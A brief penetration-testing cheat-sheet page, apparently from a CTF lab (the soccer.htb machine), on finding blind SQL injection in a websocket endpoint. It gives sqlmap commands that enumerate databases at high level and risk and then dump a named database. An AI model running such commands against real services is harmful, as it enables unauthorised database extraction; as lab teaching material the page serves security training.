Blind SQLi in Websocket

Using sqlmap to Target Websocket Applications

If you find a websocket connection, test the parameters for possible SQL innjection

<script>
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {
var btn = document.getElementById('btn');
var input = document.getElementById('id');
ws.onopen = function (e) {
console.log('connected to the server')
}
input.addEventListener('keypress', (e) => {
keyOne(e)
});
<...SNIP...>
</script>

Because we cannot directly see or access any of our queries' output, it is Blind SQLi.

Find available databases

sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id": "*"}' --dbs --threads 10 
--level 5 --risk 3 --batch

Dump specified database

sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id": "*"}' --threads 10 -D soccer_db --dump --batch

Previousxp_cmdshell PowerShell Reverse Shell NextOWASP Top 10 (2021)

Last updated 1 year ago